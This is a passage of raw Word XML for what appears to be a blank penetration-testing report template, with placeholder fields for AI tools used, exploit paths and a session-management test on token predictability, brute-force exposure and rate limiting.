                <w:numId w:val="7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082567A" w14:textId="77777777" w:rsidR="006E2ECD" w:rsidRPr="00B843A4" w:rsidRDefault="006E2ECD" w:rsidP="006E2ECD">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="7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33C5F85" w14:textId="77777777" w:rsidR="006E2ECD" w:rsidRPr="00B843A4" w:rsidRDefault="006E2ECD" w:rsidP="006E2ECD">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="7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E2967B5" w14:textId="77777777" w:rsidR="006E2ECD" w:rsidRPr="00B843A4" w:rsidRDefault="006E2ECD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E2ECD" w:rsidRPr="00B843A4" w14:paraId="32DC43E4" w14:textId="77777777" w:rsidTr="00200A8A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7A60AF9F" w14:textId="130250FA" w:rsidR="006E2ECD" w:rsidRPr="00B843A4" w:rsidRDefault="00EA6BB9" w:rsidP="00200A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Are any</w:t>
            </w:r>
            <w:r w:rsidR="003F403E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</w:t>
            </w:r>
            <w:r w:rsidR="006E2ECD" w:rsidRPr="00BA7B6B">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>AI Tools Used</w:t>
            </w:r>
            <w:r w:rsidR="003F403E">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>?</w:t>
            </w:r>
            <w:r w:rsidR="006E2ECD" w:rsidRPr="00BA7B6B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6862" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6A3E50A2" w14:textId="7FD9EB8F" w:rsidR="006E2ECD" w:rsidRDefault="006E2ECD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C030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[*ShellGPT, </w:t>
            </w:r>
            <w:r w:rsidR="00C8314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ChatGPT, </w:t>
            </w:r>
            <w:r w:rsidRPr="002C030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Custom Scripts, etc.]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="73A84A03" w14:textId="77777777" w:rsidR="006E2ECD" w:rsidRDefault="006E2ECD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A2C5C43" w14:textId="77777777" w:rsidR="006E2ECD" w:rsidRPr="002C030C" w:rsidRDefault="006E2ECD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E2ECD" w:rsidRPr="00B843A4" w14:paraId="09F51AF0" w14:textId="77777777" w:rsidTr="00200A8A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47255B98" w14:textId="77777777" w:rsidR="006E2ECD" w:rsidRPr="00927FF7" w:rsidRDefault="006E2ECD" w:rsidP="00200A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B6A7F">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Scripts or Prompts Used for Automation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6862" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7F37A0EB" w14:textId="77777777" w:rsidR="006E2ECD" w:rsidRDefault="006E2ECD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4255B3F" w14:textId="77777777" w:rsidR="006E2ECD" w:rsidRDefault="006E2ECD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6850BA8" w14:textId="77777777" w:rsidR="006A1598" w:rsidRDefault="006A1598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3EB0D92" w14:textId="77777777" w:rsidR="006A1598" w:rsidRDefault="006A1598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82A4DBC" w14:textId="77777777" w:rsidR="006E2ECD" w:rsidRPr="00927FF7" w:rsidRDefault="006E2ECD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E2ECD" w:rsidRPr="00B843A4" w14:paraId="46C88170" w14:textId="77777777" w:rsidTr="00200A8A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1B17238F" w14:textId="77777777" w:rsidR="006E2ECD" w:rsidRPr="004B6A7F" w:rsidRDefault="006E2ECD" w:rsidP="00200A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3422B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Extracted Information </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6862" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="61BBEB88" w14:textId="77777777" w:rsidR="006E2ECD" w:rsidRDefault="006E2ECD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1479E4C" w14:textId="77777777" w:rsidR="006E2ECD" w:rsidRDefault="006E2ECD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DDECCCB" w14:textId="77777777" w:rsidR="006E2ECD" w:rsidRDefault="006E2ECD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3906D93" w14:textId="77777777" w:rsidR="006A1598" w:rsidRPr="00927FF7" w:rsidRDefault="006A1598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E2ECD" w:rsidRPr="00B843A4" w14:paraId="5102BA76" w14:textId="77777777" w:rsidTr="00200A8A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151A6D49" w14:textId="77777777" w:rsidR="006E2ECD" w:rsidRPr="0033422B" w:rsidRDefault="006E2ECD" w:rsidP="00200A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F63C0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Exploit Paths</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6862" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="31DF3F2B" w14:textId="77777777" w:rsidR="006E2ECD" w:rsidRDefault="006E2ECD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[If any]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5C87308F" w14:textId="77777777" w:rsidR="006E2ECD" w:rsidRDefault="006E2ECD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95EB2EB" w14:textId="77777777" w:rsidR="006E2ECD" w:rsidRPr="00927FF7" w:rsidRDefault="006E2ECD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E2ECD" w:rsidRPr="00B843A4" w14:paraId="2C5C55F7" w14:textId="77777777" w:rsidTr="00200A8A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70B81994" w14:textId="77777777" w:rsidR="006E2ECD" w:rsidRDefault="006E2ECD" w:rsidP="00200A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F67D1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  <w:p w14:paraId="61BA455D" w14:textId="77777777" w:rsidR="006E2ECD" w:rsidRPr="007D19F7" w:rsidRDefault="006E2ECD" w:rsidP="00200A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6862" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4203F1B4" w14:textId="77777777" w:rsidR="006E2ECD" w:rsidRDefault="006E2ECD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E2ECD" w:rsidRPr="00B843A4" w14:paraId="5521173A" w14:textId="77777777" w:rsidTr="00200A8A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6D5ABAD2" w14:textId="77777777" w:rsidR="006E2ECD" w:rsidRDefault="006E2ECD" w:rsidP="00200A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b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Result Analysis</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4CBDFF2D" w14:textId="77777777" w:rsidR="006E2ECD" w:rsidRPr="004F67D1" w:rsidRDefault="006E2ECD" w:rsidP="00200A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6862" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2FF348FA" w14:textId="77777777" w:rsidR="006E2ECD" w:rsidRDefault="006E2ECD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3435A51" w14:textId="77777777" w:rsidR="006E2ECD" w:rsidRDefault="006E2ECD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9EC9171" w14:textId="77777777" w:rsidR="006E2ECD" w:rsidRDefault="006E2ECD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452BCC7" w14:textId="77777777" w:rsidR="006E2ECD" w:rsidRDefault="006E2ECD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</w:tbl>
    <w:p w14:paraId="308082F1" w14:textId="46043358" w:rsidR="00D54844" w:rsidRDefault="00D54844" w:rsidP="00D54844">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r w:rsidRPr="00D54844">
        <w:lastRenderedPageBreak/>
        <w:t>Test 5: Evaluate Session Management Security</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04C70CAD" w14:textId="11F649F9" w:rsidR="006A1598" w:rsidRDefault="00F73F0D" w:rsidP="000947B4">
      <w:pPr>
        <w:spacing w:before="120" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B804D4">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>[*</w:t>
      </w:r>
      <w:r w:rsidR="00D333A3" w:rsidRPr="00B804D4">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>In this section, you will assess and prepare reports for the target web application's session management mechanisms, which are crucial for maintaining user authentication and preserving session integrity</w:t>
      </w:r>
      <w:r w:rsidR="00F87DF3">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00B804D4">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2920A843" w14:textId="77777777" w:rsidR="00B804D4" w:rsidRPr="00B804D4" w:rsidRDefault="00B804D4" w:rsidP="000947B4">
      <w:pPr>
        <w:spacing w:before="120" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr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B804D4" w:rsidRPr="00A51A96" w14:paraId="4623B25D" w14:textId="77777777" w:rsidTr="001772BF">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9230" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="13BFF4EC" w14:textId="71ACF079" w:rsidR="00B804D4" w:rsidRPr="003C713F" w:rsidRDefault="00B804D4" w:rsidP="00725128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5.1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A63FDA" w:rsidRPr="00A63FDA">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Test Session Token Predictability</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="47C266C4" w14:textId="77777777" w:rsidR="00B804D4" w:rsidRPr="008A53FC" w:rsidRDefault="00B804D4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083DD0" w14:paraId="0B9ED39A" w14:textId="77777777" w:rsidTr="008A53F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AFA30BD" w14:textId="77777777" w:rsidR="00083DD0" w:rsidRPr="00CE4132" w:rsidRDefault="00083DD0" w:rsidP="008A53F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E4132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4B2CAABC" w14:textId="77777777" w:rsidR="00083DD0" w:rsidRPr="00CE4132" w:rsidRDefault="00083DD0" w:rsidP="0072512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83DD0" w14:paraId="2E176B4F" w14:textId="77777777" w:rsidTr="008A53F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7288499" w14:textId="77777777" w:rsidR="00083DD0" w:rsidRPr="00CE4132" w:rsidRDefault="00083DD0" w:rsidP="008A53F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E4132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1873D0A1" w14:textId="77777777" w:rsidR="00083DD0" w:rsidRPr="00CE4132" w:rsidRDefault="00083DD0" w:rsidP="0072512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83DD0" w14:paraId="3E86DB4C" w14:textId="77777777" w:rsidTr="008A53F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37C7FBA" w14:textId="77777777" w:rsidR="00083DD0" w:rsidRPr="00CE4132" w:rsidRDefault="00083DD0" w:rsidP="008A53F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Web Application</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7006" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6A3CEE17" w14:textId="77777777" w:rsidR="00083DD0" w:rsidRPr="00CE4132" w:rsidRDefault="00083DD0" w:rsidP="0072512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83DD0" w14:paraId="0E990A82" w14:textId="77777777" w:rsidTr="008A53F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697BE83" w14:textId="77777777" w:rsidR="00083DD0" w:rsidRPr="00CE4132" w:rsidRDefault="00083DD0" w:rsidP="008A53F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B12AC">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>Guess</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>ed Tokens that are Recently Used</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7006" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="468A9FB9" w14:textId="77777777" w:rsidR="00083DD0" w:rsidRDefault="00083DD0" w:rsidP="0072512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6748182" w14:textId="77777777" w:rsidR="008A53FC" w:rsidRPr="00CE4132" w:rsidRDefault="008A53FC" w:rsidP="0072512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8A3920" w14:paraId="7708C63B" w14:textId="77777777" w:rsidTr="008A53F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E925748" w14:textId="53BAED3D" w:rsidR="008A3920" w:rsidRPr="00BB12AC" w:rsidRDefault="00376441" w:rsidP="008A53FC">
            <w:pPr>
              <w:pStyle w:val="Default"/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  <w:r w:rsidRPr="00376441">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>Token Type Analyzed</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7006" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="11C31023" w14:textId="77777777" w:rsidR="008A3920" w:rsidRPr="00376441" w:rsidRDefault="00376441" w:rsidP="00725128">
            <w:pPr>
              <w:pStyle w:val="Default"/>
              <w:spacing w:before="60" w:after="60"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00376441">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>[*Session ID, Cookie Token, Hidden Form Field, etc.]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="01318FD2" w14:textId="77777777" w:rsidR="00376441" w:rsidRDefault="00376441" w:rsidP="0072512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F2B3122" w14:textId="16D386FD" w:rsidR="00376441" w:rsidRPr="00CE4132" w:rsidRDefault="00376441" w:rsidP="0072512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83DD0" w14:paraId="15F0A3DD" w14:textId="77777777" w:rsidTr="008A53F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034CC22" w14:textId="77777777" w:rsidR="00083DD0" w:rsidRPr="00BB12AC" w:rsidRDefault="00083DD0" w:rsidP="008A53FC">
            <w:pPr>
              <w:pStyle w:val="Default"/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  <w:r w:rsidRPr="00496A62">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>Determine</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>d</w:t>
            </w:r>
            <w:r w:rsidRPr="00496A62">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t xml:space="preserve"> Valid Session Token</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t xml:space="preserve">s from Requests Sent to </w:t>
            </w:r>
            <w:r w:rsidRPr="00862E38">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>Session‐</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>D</w:t>
            </w:r>
            <w:r w:rsidRPr="00862E38">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>ependent Page</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7006" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="248802F4" w14:textId="77777777" w:rsidR="00083DD0" w:rsidRPr="00CE4132" w:rsidRDefault="00083DD0" w:rsidP="00083DD0">
            <w:pPr>
              <w:pStyle w:val="Default"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="71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0E612E0" w14:textId="77777777" w:rsidR="00083DD0" w:rsidRPr="00CE4132" w:rsidRDefault="00083DD0" w:rsidP="00083DD0">
            <w:pPr>
              <w:pStyle w:val="Default"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="71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56ED2BF" w14:textId="77777777" w:rsidR="00083DD0" w:rsidRPr="00CE4132" w:rsidRDefault="00083DD0" w:rsidP="00083DD0">
            <w:pPr>
              <w:pStyle w:val="Default"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="7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797CC24" w14:textId="77777777" w:rsidR="00083DD0" w:rsidRPr="00CE4132" w:rsidRDefault="00083DD0" w:rsidP="00083DD0">
            <w:pPr>
              <w:pStyle w:val="Default"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="7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57F6A5A" w14:textId="56A8B5CF" w:rsidR="00083DD0" w:rsidRPr="00CE4132" w:rsidRDefault="00083DD0" w:rsidP="00083DD0">
            <w:pPr>
              <w:pStyle w:val="Default"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="7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41FE067" w14:textId="77777777" w:rsidR="00083DD0" w:rsidRPr="00CE4132" w:rsidRDefault="00083DD0" w:rsidP="0072512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87C0B" w14:paraId="3F737B14" w14:textId="77777777" w:rsidTr="008A53F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B626628" w14:textId="23D4A74E" w:rsidR="00787C0B" w:rsidRPr="00496A62" w:rsidRDefault="00787C0B" w:rsidP="008A53FC">
            <w:pPr>
              <w:pStyle w:val="Default"/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  <w:r w:rsidRPr="00787C0B">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>Sequential Token Pattern Observed?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7006" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5F7A0860" w14:textId="77777777" w:rsidR="00787C0B" w:rsidRPr="002D439B" w:rsidRDefault="00787C0B" w:rsidP="00787C0B">
            <w:pPr>
              <w:pStyle w:val="Default"/>
              <w:spacing w:before="60" w:after="60"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002D439B">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>[*</w:t>
            </w:r>
            <w:r w:rsidR="002D439B" w:rsidRPr="002D439B">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>Yes/No, Example if found]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0714A1FE" w14:textId="77777777" w:rsidR="002D439B" w:rsidRDefault="002D439B" w:rsidP="00787C0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C151485" w14:textId="77777777" w:rsidR="002D439B" w:rsidRDefault="002D439B" w:rsidP="00787C0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8F5F98D" w14:textId="54F418D2" w:rsidR="002D439B" w:rsidRPr="00CE4132" w:rsidRDefault="002D439B" w:rsidP="00787C0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9178FC" w14:paraId="5DEC63B6" w14:textId="77777777" w:rsidTr="008A53F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BE27E5D" w14:textId="76347040" w:rsidR="009178FC" w:rsidRPr="00787C0B" w:rsidRDefault="009178FC" w:rsidP="008A53FC">
            <w:pPr>
              <w:pStyle w:val="Default"/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  <w:r w:rsidRPr="009178FC">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>Timestamp-Based Token Detected?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7006" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="06511A14" w14:textId="77777777" w:rsidR="009178FC" w:rsidRDefault="009178FC" w:rsidP="00787C0B">
            <w:pPr>
              <w:pStyle w:val="Default"/>
              <w:spacing w:before="60" w:after="60"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>[*</w:t>
            </w:r>
            <w:r w:rsidR="0025475F" w:rsidRPr="0025475F">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>Yes/No, Example if found</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7FB843BC" w14:textId="77777777" w:rsidR="0025475F" w:rsidRDefault="0025475F" w:rsidP="00787C0B">
            <w:pPr>
              <w:pStyle w:val="Default"/>
              <w:spacing w:before="60" w:after="60"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="6B169F5B" w14:textId="4653DAAE" w:rsidR="0025475F" w:rsidRPr="002D439B" w:rsidRDefault="0025475F" w:rsidP="00787C0B">
            <w:pPr>
              <w:pStyle w:val="Default"/>
              <w:spacing w:before="60" w:after="60"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0025475F" w14:paraId="2BBCE05A" w14:textId="77777777" w:rsidTr="008A53F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FC53A30" w14:textId="1A172582" w:rsidR="0025475F" w:rsidRPr="009178FC" w:rsidRDefault="0025475F" w:rsidP="008A53FC">
            <w:pPr>
              <w:pStyle w:val="Default"/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  <w:r w:rsidRPr="0025475F">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>Brute-Force Vulnerability Detected?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7006" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="13E2E950" w14:textId="77777777" w:rsidR="0025475F" w:rsidRDefault="0025475F" w:rsidP="00787C0B">
            <w:pPr>
              <w:pStyle w:val="Default"/>
              <w:spacing w:before="60" w:after="60"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>[*</w:t>
            </w:r>
            <w:r w:rsidRPr="0025475F">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>Yes/No, Token Range Identified if applicable</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="17D49BE5" w14:textId="77777777" w:rsidR="0025475F" w:rsidRDefault="0025475F" w:rsidP="00787C0B">
            <w:pPr>
              <w:pStyle w:val="Default"/>
              <w:spacing w:before="60" w:after="60"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="46A5B601" w14:textId="77777777" w:rsidR="0025475F" w:rsidRDefault="0025475F" w:rsidP="00787C0B">
            <w:pPr>
              <w:pStyle w:val="Default"/>
              <w:spacing w:before="60" w:after="60"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="1C5609A6" w14:textId="2153AA9B" w:rsidR="0025475F" w:rsidRDefault="0025475F" w:rsidP="00787C0B">
            <w:pPr>
              <w:pStyle w:val="Default"/>
              <w:spacing w:before="60" w:after="60"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001D621A" w14:paraId="68F8EAD9" w14:textId="77777777" w:rsidTr="008A53F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B26AD8F" w14:textId="73315119" w:rsidR="001D621A" w:rsidRPr="0025475F" w:rsidRDefault="009330EB" w:rsidP="008A53FC">
            <w:pPr>
              <w:pStyle w:val="Default"/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  <w:r w:rsidRPr="009330EB">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Rate-Limiting Implemented?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7006" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="54F92C69" w14:textId="77777777" w:rsidR="001D621A" w:rsidRDefault="009330EB" w:rsidP="00787C0B">
            <w:pPr>
              <w:pStyle w:val="Default"/>
              <w:spacing w:before="60" w:after="60"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>[*</w:t>
            </w:r>
            <w:r w:rsidR="008E0BC7" w:rsidRPr="008E0BC7">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>Yes/No, Bypass Attempt Successful?</w:t>
            </w:r>
            <w:r w:rsidR="008E0BC7">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="36AF413E" w14:textId="77777777" w:rsidR="008E0BC7" w:rsidRDefault="008E0BC7" w:rsidP="00787C0B">
            <w:pPr>
              <w:pStyle w:val="Default"/>
              <w:spacing w:before="60" w:after="60"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="0AC4B91A" w14:textId="77777777" w:rsidR="008E0BC7" w:rsidRDefault="008E0BC7" w:rsidP="00787C0B">
            <w:pPr>
              <w:pStyle w:val="Default"/>
              <w:spacing w:before="60" w:after="60"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="65DCF6E7" w14:textId="7A92522E" w:rsidR="008E0BC7" w:rsidRDefault="008E0BC7" w:rsidP="00787C0B">
